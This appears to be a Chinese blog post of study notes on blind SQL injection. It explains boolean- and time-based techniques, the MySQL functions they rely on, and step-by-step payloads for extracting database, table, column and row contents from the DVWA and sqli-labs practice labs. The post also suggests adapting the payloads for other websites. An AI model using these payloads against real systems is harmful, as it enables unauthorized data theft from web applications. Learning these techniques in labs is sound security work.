zoukankan      html  css  js  c++  java
  • SQL注入学习笔记——盲注

    概念:

    如果每个应用程序都能按照我们输入的 SQL 命令返回我们需要的数据,那应用程序就无安全性可言了!为此,程序设计者们想到一个办法,那就是无论输入何种命令,只要 SQL 语句导致数据库产生错误,那么应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,回显方式的 SQL 注入办法就无法使用了。盲注,即在 SQL 注入过程中,SQL 语句执行选择后,选择的数据不能回显到前端,需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注。

    盲注类型:

    盲注分为两类:

    一、 基于布尔型 SQL 盲注;

    • 基于布尔型 SQL 盲注即在 SQL 注入过程中,应用程序仅仅返回 True(页面)和 False(页面)。

    • 无法根据应用程序的返回页面得到需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到需要的信息。

    二、 基于时间型 SQL 盲注;注入 SQL 代码之后,存在以下两种情况:

    • 如果注入的 SQL 代码不影响后台[数据库]的正常功能执行,那么 Web 应用的页面显示正确(原始页面)。

    • 如果注入的 SQL 代码影响后台数据库的正常功能(产生了 SQL 注入),但是此时Web 应用的页面依旧显示正常(原因是 Web 应用程序采取了“重定向”或“屏蔽”措施)。

    产生一个疑问:注入的 SQL 代码到底被后台数据库执行了没有?即 Web 应用程序是否存在 SQL 注入?

    面对这种情况,之前讲的基于布尔的 SQL 盲注就很难发挥作用了(因为基于布尔的 SQL 盲注的前提是 Web 程序返回的页面存在 true 和 false 两种不同的页面)。这时,一般采用基于 web 应用响应时间上的差异来判断是否存在 SQL 注入,即基于时间型 SQL 盲注。

     Mysql 盲注关键函数

    count(column_name) 函数:函数返回指定列的值的数目

     limit(m,n)函数:m 代表从 m+1 条记录行开始检索,n 代表取出 n 条数据。(m 可设为 0)

     length( ) 函数:length( )函数返回文本字段中值的长度。

    mid()substr()substring()和left()函数:这前三个函数用法基本相同,这四个都是用于截取字符串。

    用法:midsubstrsubstring (string,start,length):

    • string(必需):规定要返回其中一部分的字符串。
    • start(必需):规定开始位置(起始值是 1)。
    • length(可选):要返回的字符数。如果省略,则 mid() 函数返回剩余文本。

     

    left(string,length)函数:
    • string(必需):规定要返回其中一部分的字符串。
    • length(可选):规定被返回字符串的前 length 长度的字符。

    ascii()函数:将字符转化为 ascii 码。

    如果是字符串,则返回的最左字符的数值。也就是第一个字符的 ascii 值。如果字符串为空字符串。则返回 NULL,如果字符串为 NULL。 ASCII()返回数值是从 0 到 255 随机;

    if()函数:逻辑判断,在基于时间型 SQL 盲注中,经常使用条件语句来判断操作是否正确。

    if(expr1,expr2,expr3) 如果 expr1 为真,则 IF()函数执行 expr2 语句; 否则 IF()函数执行 expr3 语句。

    这里如果条件 ascii(substr(database(),1,1))>1 成立,则执行 sleep(5),否则执行 1。 

    sleep()函数:延迟查询,

    sleep(seconds) 即 sleep() 函数代码执行延迟若干秒。

    上面:sleep(3)设置查询停留3秒,sleep函数返回值是0,查询时间为3秒。

    下面:sleep(3)设置查询停留3秒,当查询逻辑错误时sleep函数不执行暂停,查询时间为0秒。结果为空。

     

     由于 sleep()函数返回值为 0,因此执行 select user from users where user_id=1 and sleep(3),执行能停留 3 秒,但是结果为空。

    基于布尔盲注

    上面已经介绍过了布尔盲注的概念了,这里直接构造语句了。实验的话可以去sqli-labs的第8关,或者去dvwa平台都可以,如果没安装的可以翻翻我前面的随笔,或者自己去百度。

    下面用的是dvwa,所以在自己实际注入网站过程中自行更改。

    注意:看清括号的对应关系,实际注入语句时候要注意闭合,如“--+”或者“#”之类的。

    1、 判断当前数据库名长度与数据库名

    and length(database())>n  //判断当前数据库长度

    and ascii(substr(database(),m,1))>n   //截取数据库名第 m 个字符并转换为 ascii 码

    2、 判断数据库的表长度与表名

    and length((select table_name from information_schema.tables wheretable_schema='dvwa' limit 0,1))>n   //判断第一行表名的长度

    and ascii(substr((select table_name from information_schema.tables wheretable_schema='dvwa' limit 0,1),m,1))>n   //截取第一行表名的第 m 个字符串并转换为ascii 码。

    3、 判断数据库的字段名长度与字段名称

    and length((select column_name from information_schema.columns wheretable_name='users' limit 0,1))>n //判断表中字段名的长度

    and ascii(substr((select column_name from information_schema.columns wheretable_name='users' limit 0,1),m,1))>n //截取表中字段的第 m 字符串并转换为 ascii 码

    4、 判断字段的内容长度与内容字符串

    and length((select user from users limit 0,1))>1 //判断字符串内容长度

    and ascii(substr((select user from users limit 0,1),m,1)) //截取第m个字符串并转换为ascii码

    基于时间盲注

    因为盲注过于繁琐,只介绍一下语句,这里的库、表都是sqli-labs的,所以自己在注入别的网站时候自行更改。

    其实我们看完之后就会发现,其实注入都是相通的,只需要改一下特定的payload就可以了。

    1、判断注入类型

    数值型注入:
    1 and sleep(5) and 1=1  //语句正确,有查询结果,sleep()函数执行延迟 3 秒
    1 and sleep(5) and 1=2  //语句错误,查询未延迟
    字符串型注入:
    id=1' and sleep(5) and '1'='1  //语句正确,有查询结果,sleep()函数执行延迟 3 秒
    id=1' and sleep(5) and '1'='2  //语句错误,查询未延迟

    2、猜解当前数据库名

    id=1'  and ascii(substr(database(),m,1))>n and sleep(3)--+ 或者  id=1' and if(ascii(substr(database(),m,1)) > n, sleep(3),1)--+

    这里就不解释 m和n的含义了,上面有。

    3、猜解当前数据库表名

    id=1'and ascii(substr((select table_name frominformation_schema.tables where table_schema=database( ) limita,1),m,1))>n and sleep(3) --+

    或者

    id=1' and if(ascii(substr((select table_name frominformation_schema.tables where table_schema = database() limit0,1),1,1))>1,sleep(3),1)--+

    4、猜解当前数据库的字段名

    id=1' and ascii(substr((select column_name frominformation_schema.columns where table_name=’users’ limita,1),m,1))>n and sleep(3)--+

    5、猜解各个字段对应的内容

    id=1'and ascii(substr((select username from security.users limita,1),m,1))>n and sleep(3)--+

    其实盲注很少自己手工注入,一般都是用sqlmap工具跑,后面会提到。

     

  • 相关阅读:
    二进制安装postgresql
    php mongodb扩展安装
    coinbase交易冻结时间
    linux服务器及工具常用命令
    PM2下使用 执行npm命令
    phpstorm安装PHP_CodeSniffer
    TP5 save遍历更新,过滤相邻重复字段,问题汇总
    mysqlbinlog 数据恢复
    设计模式之状态机模式
    关于c++中sleep_for函数的总结分析
  • 原文地址:https://www.cnblogs.com/qi-yuan/p/12833746.html
Copyright © 2011-2022 走看看